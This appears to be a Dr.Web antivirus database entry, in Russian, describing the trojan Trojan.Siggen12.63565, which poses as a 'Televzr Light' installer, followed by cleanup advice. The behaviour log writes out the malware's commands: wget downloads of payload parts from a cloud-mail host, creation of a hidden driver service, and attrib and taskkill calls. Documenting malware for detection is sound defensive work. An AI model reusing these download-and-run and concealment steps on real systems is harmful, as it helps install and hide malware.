Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.Siggen12.63565
Добавлен в вирусную базу Dr.Web:
2021-03-31
Описание добавлено:
2021-04-02
Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
[<HKLM>\System\CurrentControlSet\Services\SNAPSHOD0] 'ImagePath' = '<DRIVERS>\SNAPSHOD0.sys'
Создает следующие сервисы
'SNAPSHOD0' <DRIVERS>\SNAPSHOD0.sys
Вредоносные функции
Запускает на исполнение
'%WINDIR%\syswow64\taskkill.exe' /im "<Имя файла>.exe" /F
'%WINDIR%\syswow64\taskkill.exe' /im SnapShot.Exe /F
Изменения в файловой системе
Создает следующие файлы
%TEMP%\televzrlight.bat
u:\televzrlight\resources.pak
u:\televzrlight\resources\app-update.yml
u:\televzrlight\resources\app.asar
u:\televzrlight\resources\app.asar.unpacked\bundle\7f8b663e6218621b36b1867f8f2ff543.ico
u:\televzrlight\resources\app.asar.unpacked\bundle\c0edcf9115ff85441b19ff0e2f387c2d.ico
u:\televzrlight\snapshot_blob.bin
u:\televzrlight\v8_context_snapshot.bin
u:\televzrlight\vk_swiftshader_icd.json
u:\televzrlight\licenses.chromium.html
u:\televzrlight\locales\ru.pak
u:\televzrlight\d3dcompiler_47.dll
u:\televzrlight\libglesv2.dll
u:\televzrlight\resources\bin_ia32\ffmpeg.exe
u:\televzrlight\resources\bin_ia32\ffprobe.exe
u:\televzrlight\resources\bin_ia32\youtube-dl.exe
u:\televzrlight\resources\elevate.exe
u:\televzrlight\swiftshader\libegl.dll
u:\televzrlight\swiftshader\libglesv2.dll
u:\televzrlight\televlight.exe
u:\televzrlight\ffmpeg.dll
u:\televzrlight\libegl.dll
u:\televzrlight\license.electron.txt
u:\televzrlight\icudtl.dat
u:\televzrlight\chrome_200_percent.pak
%TEMP%\ok.js
%TEMP%\wz.bat
nul
%TEMP%\2mvpt9fx1
%TEMP%\rd.sna
%TEMP%\wg.bat
%TEMP%\4wvhh5s1u
<DRIVERS>\snapshod0.sys
%TEMP%\8televzrlight.#
%TEMP%\wget.exe
%TEMP%\7televzrlight.#
%TEMP%\4televzrlight.#
%TEMP%\2televzrlight.#
%TEMP%\5televzrlight.#
%TEMP%\3televzrlight.#
%WINDIR%\temp\udda0e.tmp
%TEMP%\1televzrlight.#
%TEMP%\conf1televzrlight
%TEMP%\123televzrlight.exe
u:\televzrlight\chrome_100_percent.pak
%TEMP%\6televzrlight.#
u:\televzrlight\vk_swiftshader.dll
u:\televzrlight\vulkan-1.dll
Удаляет следующие файлы
%TEMP%\ok.js
%WINDIR%\temp\udda0e.tmp
%TEMP%\1televzrlight.#
%TEMP%\2televzrlight.#
%TEMP%\3televzrlight.#
%TEMP%\4televzrlight.#
%TEMP%\5televzrlight.#
%TEMP%\6televzrlight.#
%TEMP%\7televzrlight.#
%TEMP%\8televzrlight.#
%TEMP%\4wvhh5s1utelevzrlight
%TEMP%\conf1televzrlight
%TEMP%\wget.exe
%TEMP%\123televzrlight.exe
Перемещает следующие файлы
%TEMP%\2mvpt9fx1 в %TEMP%\snapshot.exe
%TEMP%\4wvhh5s1u в %TEMP%\4wvhh5s1utelevzrlight
Подменяет следующие файлы
Сетевая активность
Подключается к
'cl######.datacloudmail.ru':80
'cl######.datacloudmail.ru':443
TCP
'cl######.datacloudmail.ru':443
UDP
DNS ASK cl######.datacloudmail.ru
Другое
Ищет следующие окна
ClassName: '' WindowName: ''
ClassName: '' WindowName: '1174094/1240'
ClassName: '' WindowName: '1174359/2412'
ClassName: 'Chrome_MessageWindow' WindowName: '%APPDATA%\Televzr Light'
Создает и запускает на исполнение
'%TEMP%\wget.exe' --no-check-certificate --output-document=4TelevzrLight.# http://cl######.datacloudmail.ru/weblink/get/2Ho6/4Hyf3s1K8
'u:\televzrlight\televlight.exe' --type=utility --field-trial-handle=1168,3857680795091126992,5143947144401809858,131072 --enable-features=WebComponentsV0Enabled --disable-features=HardwareMediaKeyHandling,SpareRendererForSite...
'u:\televzrlight\televlight.exe'
'%TEMP%\123televzrlight.exe'
'%TEMP%\wget.exe' --no-check-certificate --output-document=7TelevzrLight.# http://cl######.datacloudmail.ru/weblink/get/3Wm4/5HmmAPQhB
'%TEMP%\wget.exe' --no-check-certificate --output-document=8TelevzrLight.# http://cl######.datacloudmail.ru/weblink/get/2PvF/3d6Dr8kpv
'%TEMP%\wget.exe' --no-check-certificate --output-document=6TelevzrLight.# http://cl######.datacloudmail.ru/weblink/get/2MFa/Nc2dFhXQU
'%TEMP%\wget.exe' --no-check-certificate --output-document=5TelevzrLight.# http://cl######.datacloudmail.ru/weblink/get/3zKf/33SUMH8LK
'u:\televzrlight\televlight.exe' --type=gpu-process --field-trial-handle=1168,3857680795091126992,5143947144401809858,131072 --enable-features=WebComponentsV0Enabled --disable-features=HardwareMediaKeyHandling,SpareRendererFor...
'%TEMP%\wget.exe' --no-check-certificate --output-document=1TelevzrLight.# http://cl######.datacloudmail.ru/weblink/get/5yGn/4PKJoMVjZ
'%TEMP%\wget.exe' --no-check-certificate http://cl######.datacloudmail.ru/weblink/get/3egv/4Wvhh5S1u
'%TEMP%\snapshot.exe' Rd.Sna U: -vq
'%TEMP%\snapshot.exe' -!unmount
'%TEMP%\wget.exe' --no-check-certificate --output-document=Rd.Sna http://cl######.datacloudmail.ru/weblink/get/2gXn/hH5sR16jd
'%TEMP%\wget.exe' --no-check-certificate http://cl######.datacloudmail.ru/weblink/get/3FZq/2MVPt9fx1
'%TEMP%\wget.exe' --no-check-certificate --output-document=3TelevzrLight.# http://cl######.datacloudmail.ru/weblink/get/5tTD/3oZrDRiwB
'%TEMP%\wget.exe' --no-check-certificate --output-document=2TelevzrLight.# http://cl######.datacloudmail.ru/weblink/get/4GSQ/3TZADfSLX
'%WINDIR%\syswow64\reg.exe' QUERY HKCU\SOFTWARE\Televzr /v userid' (со скрытым окном)
'%WINDIR%\syswow64\reg.exe' QUERY "HKCU\SOFTWARE\Televzr Light" /v vid' (со скрытым окном)
'%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\TelevzrLight.Bat" "<Полный путь к файлу>" "<Текущая директория>" "<Имя файла>.exe" "%LOCALAPPDATA%\Temp" "' (со скрытым окном)
Запускает на исполнение
'%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\TelevzrLight.Bat" "<Полный путь к файлу>" "<Текущая директория>" "<Имя файла>.exe" "%LOCALAPPDATA%\Temp" "
'%WINDIR%\syswow64\cmd.exe' /c tasklist /nh /fo csv /v | find /i "Televzr Light"
'%WINDIR%\syswow64\reg.exe' QUERY "HKCU\SOFTWARE\Televzr Light" /v vid
'%WINDIR%\syswow64\reg.exe' QUERY HKCU\SOFTWARE\Televzr /v userid
'%WINDIR%\syswow64\ping.exe' -n 4 localhost
'%WINDIR%\syswow64\attrib.exe' -r %TEMP%\wz.bat
'%WINDIR%\syswow64\find.exe' /i "Wget.Exe"
'%WINDIR%\syswow64\tasklist.exe' /fi "IMAGENAME eq Wget.Exe"
'%WINDIR%\syswow64\find.exe' /i "Televzr Light"
'%WINDIR%\syswow64\ping.exe' -n 2 localhost
'%WINDIR%\syswow64\attrib.exe' +r SnapShot.Exe
'%WINDIR%\syswow64\attrib.exe' +a +r +h +s SnapShod0.Sys
'%WINDIR%\syswow64\ping.exe' -n 6 localhost
'%WINDIR%\syswow64\cmd.exe' /K wz.bat
'%WINDIR%\syswow64\attrib.exe' +r wz.bat
'%WINDIR%\syswow64\cscript.exe' Ok.Js //Nologo
'%WINDIR%\syswow64\attrib.exe' +r TelevzrLight.Bat
'%WINDIR%\syswow64\cmd.exe' /K wg.bat
'%WINDIR%\syswow64\tasklist.exe' /nh /fo csv /v
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK